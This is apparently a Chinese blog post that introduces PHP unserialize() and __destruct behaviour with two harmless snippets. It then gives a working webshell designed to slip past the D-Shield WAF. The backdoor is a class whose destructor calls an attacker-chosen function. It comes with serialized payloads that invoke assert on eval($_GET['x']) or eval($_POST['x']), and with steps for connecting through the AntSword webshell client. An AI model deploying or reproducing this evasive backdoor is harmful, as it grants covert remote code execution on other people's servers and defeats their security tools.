PHP反序列化介绍:

在PHP进行反序列化时,会将序列化中的变量传入类中,并且调用__destuct等魔法函数。

TestCode1:

<?php

class A{
    public $name = 'xxxx';

    function __destruct(){
       echo $this->name;
    }
}

echo serialize(new A());

?>

输出:

xxxxO:1:"A":1:{s:4:"name";s:4:"xxxx";}

TestCode2:

<?php

class A{
    public $name = 'xxxx';

    function __destruct(){
       echo $this->name;
    }
}

unserialize('O:1:"A":1:{s:4:"name";s:9:"wogaosuni";}');

?>

输出:

wogaosuni

可以发现原来的变量已经被我们替换了。

利用反序列化写马绕过D盾等WAF:

Code:

<?php

class A{
    public $name;
    public $male;

    function __destruct(){
       $a = $this->name;
       $a($this->male);
    }
}

unserialize($_POST['un']);
?>

POST传参传入:

un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:16:"eval($_GET["x"])";}

GET 传入:

x=phpinfo();

使用蚂剑:

  1. 连接密码:x

190729152569126276576dea2d.jpg

  1. 配置一下请求信息,配置一个HTTP BODY,如下
Name:un
Value:O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:17:"eval($_POST["x"])";}

19072915299b5df0ff83639a18.jpg

效果:

D.png
test.png